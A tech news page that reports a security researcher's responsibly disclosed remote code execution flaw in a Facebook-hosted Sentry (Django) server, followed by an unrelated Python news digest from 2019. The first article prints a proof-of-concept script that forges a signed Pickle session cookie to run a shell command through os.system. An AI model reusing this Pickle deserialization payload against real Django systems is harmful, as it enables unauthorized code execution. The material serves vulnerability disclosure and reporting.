Another Facebook Vulnerability to be Found

Cybersecurity specialist from SCRT find a way to execute code on Facebook server remotely
27 August 2018   1881

Daniel Le Gall from SCRT, reported about the vulnerability he found in one of the Facebook servers. The problem is in the Sentry web application for logs storage, written in Python using the Django framework. Facebook experts have already patched a security hole in the server.

Daniel found the problem during the scanning of IP addresses of to the social network. On one of them Sentry service was located with host name When reviewing the application, the specialist noticed a stack trace that appears for an unexpected reason, and problems with the user password reset function. According to him, the Django debugging mode was not disabled, so the trace opened the entire environment of the program:

Facebook Vulnerability
Facebook Vulnerability

SCRT expert discovered among the keys of the environment SESSION_SERIALIZER, which was related to the method django.contrib.sessions.serializers.PickleSerializer. Daniel clarified that using a fake session containing arbitrary content of the binary Pickle protocol for serializing objects in Python, you can run any code in the system. To access the session, he needed a secret Django key, which appeared in the list of Sentry settings in plaintext called system.secret-key:

Facebook Vulnerability
Facebook Vulnerability

The researcher wrote a proof-of-concept script that changed the existing contents of sentrysid cookies to an arbitrary object and made the page load for 30 seconds longer:

import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

#Initial cookie I had on sentry when trying to reset a password
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent information about the vulnerability to Facebook team and received $ 5000 under the Bug Bounty program. The company specialists cleared the issue in 10 days after receiving the notification.

Python News Digest 12 - 18.10

How to Read SAS Files in Python With Pandas, Python 3.8 and it's features, binning data with pandas qcut and cut and much more interestg stuff
18 October 2019   64

Greetings! I hope your week went great! Here's new Frontend news digest.

Biggest news in Python world this week is a realse of the Python 3.8. Also, beginners will be able to get familiar with meta-programming and Emacs editor, new Django version and other things are enlighten too.


        • Meta-Programming in Python

        Small, but full-fledged guide about decorators and meta-classes

        • Emacs: The Best Python Editor?

        Guide for a started on the popular Python editor

        • How to Read SAS Files in Python With Pandas

        With this guide, you will learn how to read SAS (.sas7bdat) files in Python, and how to write a SAS file to CSV using Pandas and pyreadstat.


        • Cool New Features in Python 3.8

        Learn about some of the biggest changes in the new language update.

        • Thousands of Scientific Papers May Be Invalid Due to Misunderstanding Python

        It was assumed that glob.glob() returns a sorted list of files, but it doesn’t; this led to huge amount of issues in several published scientific paper

        • Binning Data With Pandas qcut And cut

        This post explains the differences between the two commands and when and how to use each.

        • Top Three Mistakes With K-Means Clustering During Data Analysis

        Close look on 3 cases where KMC algorithm does not perform well or may produce unintuitive results


        • Python 3.8.0 Released

        New release contains assignment expressions, positional-only arguments and more.

        • Django 3.0 beta 1 released

        Another update of the popular Python framework.

        • PyPy V7.2 Released

        A new rease of Python implementation on Python (C, like original one) brings lot of new features, such as ARM aarch64 support, new JSON decoder, sandboxing makes a return, etc